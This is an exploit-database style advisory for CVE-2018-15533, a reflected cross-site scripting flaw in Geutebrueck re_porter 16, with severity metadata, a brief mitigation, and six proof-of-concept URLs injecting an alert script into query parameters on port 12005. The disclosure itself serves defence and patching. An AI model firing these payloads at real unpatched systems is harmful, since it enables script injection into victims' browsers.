Geutebrueck re_porter 16 - Cross-Site Scripting

vendor:

re_porter 16

by:

Kamil Suska

6.1

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: re_porter 16

Affected Version From: prior 7.8.974.20

Affected Version To: prior 7.8.974.20

Patch Exists: YES

Related CWE: CVE-2018-15533

CPE: a:geutebrueck:re_porter_16

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Geutebrueck re_porter 16 – Cross-Site Scripting

Geutebrueck re_porter 16 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the vulnerable parameters of the application. This code will be executed in the browser of the victim when the malicious URL is visited.

Mitigation:

Input validation should be used to prevent XSS attacks. The application should validate all user input and reject any input that contains malicious code.

Source

Exploit-DB raw data:

# Exploit Title: Geutebrueck re_porter 16 - Cross-Site Scripting
# Date: 2018-08-03
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15533

# Attack Vectors
http://example.com:12005/modifychannel/exec?vv9r7<script>alert(1)</script>auubw=1

http://example.com:12005/images/IOMemoryPool.png?ebmf6<script>alert(1)</script>pmsih=1

http://example.com:12005/images/Statistics.png?q3dlx<script>alert(1)</script>zjvdw=1

http://example.com:12005/images/GLIBBackground.jpg?itfvf<script>alert(1)</script>irvnl=1

http://example.com:12005/images/MainMemoryPool.png?bzu69<script>alert(1)</script>m2hhj=1

http://example.com:12005/images/ProcessMemory.png?f4d7j<script>alert(1)</script>m5by3=